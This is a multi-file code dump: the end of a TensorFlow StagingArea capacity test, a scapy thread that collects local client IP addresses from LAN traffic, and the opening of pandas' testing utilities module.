# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i,
sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertTrue(sess.run(size) == capacity)
# Clear the staging area completely
for i in range(n):
self.assertTrue(sess.run(ret) == i)
# It should now be empty
self.assertTrue(sess.run(size) == 0)
def testMemoryLimit(self):
memory_limit = 512*1024 # 512K
    chunk = 200*1024 # 200K
capacity = memory_limit // chunk
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.uint8, name='x')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.uint8, ],
memory_limit=memory_limit, shapes=[[]])
stage = stager.put([x])
ret = stager.get()
size = stager.size()
G.finalize()
from six.moves import queue as Queue
import threading
import numpy as np
queue = Queue.Queue()
n = 8
with self.test_session(use_gpu=True, graph=G) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: np.full(chunk, i, dtype=np.uint8)})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i,
sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertTrue(sess.run(size) == capacity)
# Clear the staging area completely
for i in range(n):
self.assertTrue(np.all(sess.run(ret) == i))
self.assertTrue(sess.run(size) == 0)
if __name__ == '__main__':
test.main()
|
mod_getting_packets.py
|
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
# Built-in modules
import time, sys, socket
from threading import Thread
# Third-party modules
try:
    from scapy.all import *
except ModuleNotFoundError as err:
    print(err)
    sys.exit(1)
# Internal modules
try:
    from mod_common import *
except ModuleNotFoundError as err:
    print(err)
    sys.exit(1)
# Class for working with network packets
class getting_packets(Thread):
    # Initial parameters
    def __init__(self, threads_list, todolist):
        super().__init__()
        self.socket = None
        self.daemon = True
        self.threads_list = threads_list
        self.todolist = todolist
        self.ip_clients = []
        self.ip_local = get_ip_local()
    # IP handler
    def work_with_ip(self, todolist):
        # Write to the log file
        log_write('Thread work_with_ip running')
        while not app_work.empty():
            # Clear the list of IP addresses
            if self.todolist.empty():
                self.ip_clients.clear()
            # Pause the thread
            time.sleep(1)
            if app_work.empty():
                break
        # Write to the log file
        log_write('Thread work_with_ip stopped')
        # Remove the thread from the list
        self.threads_list.get()
    # Handler for each network packet
    def work_with_packet(self, packet):
        # Check that the packet is valid and that the source IP is not the server itself
        if IP in packet[0] and packet[1].src not in self.ip_local:
            # Check that the source address belongs to the local network
            if packet[1].src.find(get_config('ADUserIPMask')) != -1:
                # Check that the IP address is not already in the list
                if packet[1].src not in self.ip_clients:
                    # Get the IP address
                    ip_addr = packet[1].src
                    # Add the IP address to the list of new clients
                    self.ip_clients.append(ip_addr)
                    # Add the IP address to the queue
                    self.todolist.put(ip_addr)
    # Main body of the thread
    def run(self):
        # Start the IP-processing thread
        Thread(target=self.work_with_ip, args=(self.todolist,)).start()
        # Start the packet handler
        self.socket = conf.L2listen(type=ETH_P_ALL, filter="ip")
        sniff(opened_socket=self.socket, iface=get_config('LANInterface'), prn=self.work_with_packet, store=0)
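# A minimal usage sketch (assumption: `get_config`, `log_write` and `app_work`
# come from mod_common, as elsewhere in this project; the queue names below are
# illustrative):
#
#     from queue import Queue
#     threads_list, todolist = Queue(), Queue()
#     sniffer = getting_packets(threads_list, todolist)
#     sniffer.start()                 # sniffs on the interface named by get_config('LANInterface')
#     new_client_ip = todolist.get()  # newly seen client IPs are queued here
#
# The thread is a daemon, so it stops automatically when the main program exits.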
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, List, Optional, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as path:
        pd.to_pickle(obj, path)
        return pd.read_pickle(path)
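# A short round-trip illustration (sketch):
#
#     >>> df = pd.DataFrame({"a": [1, 2, 3]})
#     >>> assert_frame_equal(df, round_trip_pickle(df))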
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
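# A small round-trip sketch pairing write_to_compressed with decompress_file
# (the temporary filename suffix is illustrative):
#
#     >>> with ensure_clean("__example__.csv.gz") as path:
#     ...     write_to_compressed("gzip", path, b"a,b\n1,2\n")
#     ...     with decompress_file(path, "gzip") as f:
#     ...         assert f.read() == b"a,b\n1,2\n"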
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
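# A quick illustration (sketch; values chosen so the default tolerance passes):
#
#     >>> assert_almost_equal(0.1 + 0.2, 0.3)
#     >>> assert_almost_equal(pd.Series([1.0, 2.0]), pd.Series([1.0, 2.0 + 1e-9]))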
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return type(x).__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
    assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj=str(obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
f"[datetimelike_compat=True] {left.values} "
f"is not equal to {right.values}."
)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
